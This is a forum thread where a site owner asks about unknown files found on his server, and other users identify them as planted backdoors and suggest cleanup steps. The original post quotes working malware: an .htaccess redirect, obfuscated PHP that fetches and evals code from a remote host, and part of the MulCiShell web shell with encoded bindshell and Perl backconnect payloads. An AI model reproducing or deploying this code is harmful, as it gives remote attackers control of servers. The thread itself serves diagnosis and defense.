Not sure what these files are or where they came from!

[ade_dnb]

I was doing a backup and about to do an upgrade when I came across these files but don't know where they came from.

In forum root there are two. 5725.php, mshell.php and an entry into the .htaccess . In the attachment folder I have the same 3 files and in every other attachment folder. The same for customavatars, customprofilepics and signaturepics. mshell.php is allways named the same but the first file, 5725.php, is allways a string of numbers which are different.

Has anybody come across these before? What are they, what are they supposed to do and what should I do about them?

.htaccess

Code:

Options -MultiViews
ErrorDocument 404 //forum/5725.php

Options -MultiViews
ErrorDocument 404 /forum/5725.php

5725.php

Code:

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="ec0962378ef742df0bcf07a488bc5697") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2FkczIu").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

mshell.php

Code:

<?php
#/\/\/\/\/\  MulCiShell v0.2 /\/\/\/\/\/\/\#
# Updates from version 1.0#
# 1) Fixed MySQL insert function
# 2) Fixed trailing dirs
# 3) Fixed file-editing when set to 777
# 4) Removed mail function (who needs it?)
# 5) Re-wrote & improved interface
# 6) Added actions to entire directories
# 7) Added config+forum finder
# 8) Added MySQL dump function
# 9) Added DB+table creation, DB drop, table delete, and column+table count
# 10) Updated security-info feature to include more useful details
# 11) _Greatly_ Improved file browsing and handling
# 12) Added banner
# 13) Added DB-Parser and locator
# 14) Added enumeration function
# 15) Added common functions for bypassing security restrictions
# 16) Added bindshell & backconnect (needs testing)
# 17) Improved command execution (alts)
#/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/#
@ini_set("memory_limit","256M");
@set_magic_quotes_runtime(0);
session_start();
ob_start();
$start=microtime();
if(isset($_GET['theme'])) $_SESSION['theme']=$_GET['theme'];
//Thanks korupt ;)
$backdoor_c="DQojaW5jbHVkZSA8YXNtL2lvY3Rscy5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQojaW5jbHVkZSA8c3lzL3NlbGVjdC5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN0ZGludC5oPg0KI2luY2x1ZGUgPHB0aHJlYWQuaD4NCg0Kdm9pZCAqQ2xpZW50SGFuZGxlcih2b2lkICpjbGllbnQpDQp7DQoJaW50IGZkID0gKGludCljbGllbnQ7DQoJZHVwMihmZCwgMCk7DQoJZHVwMihmZCwgMSk7DQoJZHVwMihmZCwgMik7DQoJaWYoZm9yaygpID09IDApDQoJCWV4ZWNsKCIvYmluL2Jhc2giLCAicmVzbW9uIiwgMCk7DQoJY2xvc2UoZmQpOw0KCXJldHVybiAwOw0KfQ0KDQppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqYXJndltdKQ0Kew0KCWludCBtc29jaywgY3NvY2ssIGkgPSAxOw0KCXB0aHJlYWRfdCB0aHJlYWQ7DQoJc3RydWN0IHNvY2thZGRyIHNhZGRyOw0KCXN0cnVjdCBzb2NrYWRkcl9pbiBzYWRkckluOw0KICAgIGludCBwb3J0PWF0b2koYXJndlsxXSk7DQoJaWYoKG1zb2NrID0gc29ja2V0KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBJUFBST1RPX1RDUCkpID09IC0xKQ0KCQlyZXR1cm4gLTE7DQoNCglzYWRkckluLnNpbl9mYW1pbHkJCT0gQUZfSU5FVDsNCglzYWRkckluLnNpbl9hZGRyLnNfYWRkcgk9IElOQUREUl9BTlk7DQoJc2FkZHJJbi5zaW5fcG9ydAkJPSBodG9ucyhwb3J0KTsNCiAgIA0KCW1lbWNweSgmc2FkZHIsICZzYWRkckluLCBzaXplb2Yoc3RydWN0IHNvY2thZGRyX2luKSk7DQoJc2V0c29ja29wdChtc29jaywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAoY2hhciAqKSZpLCBzaXplb2YoaSkpOw0KIA0KCWlmKGJpbmQobXNvY2ssICZzYWRkciwgc2l6ZW9mKHNhZGRyKSkgIT0gMCl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0KCX0NCiANCglpZihsaXN0ZW4obXNvY2ssIDEwKSA9PSAtMSl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0KCX0NCiANCgl3aGlsZSgxKXsNCgkJaWYoKGNzb2NrID0gYWNjZXB0KG1zb2NrLCBOVUxMLCBOVUxMKSkgIT0gLTEpew0KCQkJcHRocmVhZF9jcmVhdGUoJnRocmVhZCwgMCwgaGFuZGxlciwgKHZvaWQgKiljc29jayk7DQoJCX0NCgl9DQoJDQoJcmV0dXJuIDE7DQp9";
$backconnect_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KbXkgKCRpYWRkciwkcG9ydCwkY21kKT1AQVJHVjsNCm15ICRwYWRkcj1zb2NrYWRkcl9pbigkcG9ydCwgaW5ldF9hdG9uKCRpYWRkcikpOw0KbXkgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0Kc29ja2V0KFNPQ0tFVCwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90byk7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERJTiwiPiZTT0NLRVQiKTsNCnByaW50IFNPQ0tFVCAiU2hlbGwgdGVzdFxuIjsNCnByaW50IGV4ZWMoJGNtZCk7DQpjbG9zZShTVERJTik7DQpjbG9zZShTVERPVVQpOw0K";
$pl_scan="DQoJIyEvdXNyL2Jpbi9wZXJsDQp1c2Ugd2FybmluZ3M7DQp1c2Ugc3RyaWN0Ow0KdXNlIGRpYWdub3N0aWNzOw0KdXNlIElPOjpTb2NrZXQ6OklORVQ7DQpzdWIgdXNhZ2UNCnsNCglkaWUoIiQwIGhvc3Qgc3RhcnRwb3J0IGVuZHBvcnQKIik7DQp9DQp1c2FnZSB1bmxlc3MoQEFSR1Y+MSk7DQpteSgkaG9zdCwkcywkZSk9QEFSR1Y7DQpmb3JlYWNoKCRzLi4kZSkNCnsNCglteSAkc29jaz1JTzo6U29ja2V0OjpJTkVULT5uZXcNCgkoDQoJCVBlZXJBZGRyPT4kaG9zdCwNCgkJUGVlclBvcnQ9PiRfLA0KCQlQcm90bz0+J3RjcCcsDQoJCVRpbWVvdXQ9PjINCgkpOw0KCXByaW50ICJQb3J0ICBvcGVuCiIgaWYgKCRcc29jayk7DQp9DQoNCgk=";
$access_control=0;
$md5_user="MulCiber";
$md5_pass="123";
$user_agent="MulCiber";
$allowed_addrs=array('127.0.0.1');
$shell_email="mulciber-@hotmail.com";
$self=basename($_SERVER['PHP_SELF']);
$addr=$_SERVER['REMOTE_ADDR'];
$serv=@gethostbyname($_SERVER['HTTP_HOST']);
$soft=$_SERVER['SERVER_SOFTWARE'];
==========FILE CUT=============

[Marco van Herwaarden]

they are for sure unwanted files that most likely are used to hack your site.

[ade_dnb]

Thanks for your reply.

I have already removed all instances of them but I haven't been hacked or haven't seen anything that would indicate it. I have seen quite a few site that have these files as well but haven't found any information about them.

[SEOvB]

Quote:

Originally Posted by ade_dnb

Thanks for your reply.

I have already removed all instances of them but I haven't been hacked or haven't seen anything that would indicate it. I have seen quite a few site that have these files as well but haven't found any information about them.

The fact that files are there you didnt place there, is a good indication that you've been hacked. Along with removing those files, i'd update passwords, remove any modifications you dont need and make sure your server software is the most up to date versions available

[ForumsMods]

You have the directory chmod 777 and anonymous ftp activated.

[benstillman]

Seems to be a shell someone has uploaded onto your server.

Google: http://www.google.com/search?q=mshell.php

Looks nasty. Real nasty. Scary nasty. I'm going to start scanning for these files on my own servers.

[benstillman]

Looks like this is done by a Remote File Inclusion exploit.

mshell is one of many shell scripts users upload to your server or run remotely via the exploit. It's nasty. I read up on it the other night. I had no idea anything like that could be done. Nasty nasty. Stupid script kiddies.